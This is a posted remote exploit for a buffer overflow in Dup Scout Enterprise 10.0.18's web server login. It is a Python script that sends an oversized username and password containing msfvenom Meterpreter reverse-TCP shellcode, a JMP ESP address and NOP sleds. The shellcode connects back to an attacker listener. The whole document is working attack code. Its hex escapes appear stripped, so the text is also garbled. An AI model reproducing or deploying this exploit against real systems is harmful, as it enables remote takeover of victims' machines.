Dup Scout Enterprise 10.0.18 Buffer Overflow
Posted on 15 November 2017
# Tested on Windows 10 (x86) # The application requires to have the web server enabled. # Exploit for older version: https://www.exploit-db.com/exploits/40832/ #!/usr/bin/python import socket,os,time,struct,argparse parser = argparse.ArgumentParser() parser.add_argument('--host', required=True) args = parser.parse_args() host = args.host port = 80 # root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.116.166 LPORT=4455 -b "x00x0ax0dx25x26x2bx3d" -f py shellcode = "" shellcode += "xbaxb6x9fx39x88xd9xf7xd9x74x24xf4x5ex31" shellcode += "xc9xb1x54x83xeexfcx31x56x0fx03x56xb9x7d" shellcode += "xccx74x2dx03x2fx85xadx64xb9x60x9cxa4xdd" shellcode += "xe1x8ex14x95xa4x22xdexfbx5cxb1x92xd3x53" shellcode += "x72x18x02x5dx83x31x76xfcx07x48xabxdex36" shellcode += "x83xbex1fx7fxfex33x4dx28x74xe1x62x5dxc0" shellcode += "x3ax08x2dxc4x3axedxe5xe7x6bxa0x7exbexab" shellcode += "x42x53xcaxe5x5cxb0xf7xbcxd7x02x83x3ex3e" shellcode += "x5bx6cxecx7fx54x9fxecxb8x52x40x9bxb0xa1" shellcode += "xfdx9cx06xd8xd9x29x9dx7axa9x8ax79x7bx7e" shellcode += "x4cx09x77xcbx1ax55x9bxcaxcfxedxa7x47xee" shellcode += "x21x2ex13xd5xe5x6bxc7x74xbfxd1xa6x89xdf" shellcode += "xbax17x2cxabx56x43x5dxf6x3exa0x6cx09xbe" shellcode += "xaexe7x7ax8cx71x5cx15xbcxfax7axe2xc3xd0" shellcode += "x3bx7cx3axdbx3bx54xf8x8fx6bxcex29xb0xe7" shellcode += "x0exd6x65x9dx04x40x2ax72x6dx36x5ax71x8d" shellcode += "x27xfcxfcx6bx17x52xafx23xd7x02x0fx94xbf" shellcode += "x48x80xcbxdfx72x4ax64x75x9dx23xdcxe1x04" shellcode += "x6ex96x90xc9xa4xd2x92x42x4dx22x5cxa3x24" shellcode += "x30x88xd2xc6xc8x48x7fxc7xa2x4cx29x90x5a" shellcode += "x4ex0cxd6xc4xb1x7bx64x02x4dxfax5dx78x7b" shellcode += "x68xe2x16x83x7cxe2xe6xd5x16xe2x8ex81x42" shellcode += "xb1xabxcex5exa5x67x5ax61x9cxd4xcdx09x22" shellcode += "x02x39x96xddx61x3axd1x22xf7x1ex7ax4bx07" shellcode += "x1ex7ax8bx6dx9ex2axe3x7axb1xc5xc3x83x18" shellcode += "x8ex4bx09xccx7cxedx0exc5x21xb3x0fxe9xf9" shellcode += "xa2x81x0exfexcax63x33x28xf3x11x74xe8x40" shellcode += "x29xcfx4dxe0xa0x2fxc1xf2xe0" buffer = "x41" * 780 buffer += struct.pack("<L", 0x10090c83) # JMP ESP - libspp buffer += "x90" * 12 buffer += shellcode buffer += "x90" * (10000 - len(buffer)) evil = "POST /login HTTP/1.1 " evil += "Host: 192.168.228.140 " evil += "User-Agent: Mozilla/5.0 " evil += "Connection: close " evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 " evil += "Accept-Language: en-us,en;q=0.5 " evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 " evil += "Keep-Alive: 300 " evil += "Proxy-Connection: keep-alive " evil += "Content-Type: application/x-www-form-urlencoded " evil += "Content-Length: 17000 " evil += "username=" + buffer evil += "&password=" + buffer + " " s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect((host,port)) print 'Sending evil buffer...' s.send(evil) print 'Payload Sent!' s.close()
